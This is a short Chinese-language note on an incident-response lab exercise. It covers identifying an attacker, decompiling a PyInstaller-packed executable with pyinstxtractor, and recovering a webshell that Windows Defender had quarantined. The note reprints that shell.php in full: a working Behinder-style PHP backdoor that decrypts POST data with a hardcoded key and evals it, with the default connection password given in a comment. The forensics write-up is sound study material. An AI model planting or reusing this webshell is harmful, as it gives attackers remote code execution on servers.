个人觉得这篇讲得非常详细https://blog.csdn.net/W13680336969/article/details/137295391
web1比web2简单了很多。。。
主要知识点:1、查找攻击者用户名以及ip地址。
2、发现是用 pyinstaller 打包的 exe 文件,利用 pyinstxtractor 进行反编译(是怎么发现用pyinstaller打包的我不知道)
python .\pyinstxtractor.py .\Kuang.exe得到可以看的pyc文件。
3、shell可以用D盾检测目录,也可以读log文件找到。不过刚找到就被靶机自带的windows defence查杀了,那你早干嘛去了呢。。。要找到windows安全中心中的保护历史记录再恢复。。。
以上。这篇还是很简单的。
这里再次把shell.php内容贴入便于查看。
<?php
@error_reporting(0);
session_start();
$key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond
$_SESSION['k']=$key;
session_write_close();
$post=file_get_contents("php://input");
if(!extension_loaded('openssl'))
{
$t="base64_"."decode";
$post=$t($post."");
for($i=0;$i<strlen($post);$i++) {
$post[$i] = $post[$i]^$key[$i+1&15];
}
}
else
{
$post=openssl_decrypt($post, "AES128", $key);
}
$arr=explode('|',$post);
$func=$arr[0];
$params=$arr[1];
class C{public function __invoke($p) {eval($p."");}}
@call_user_func(new C(),$params);
?>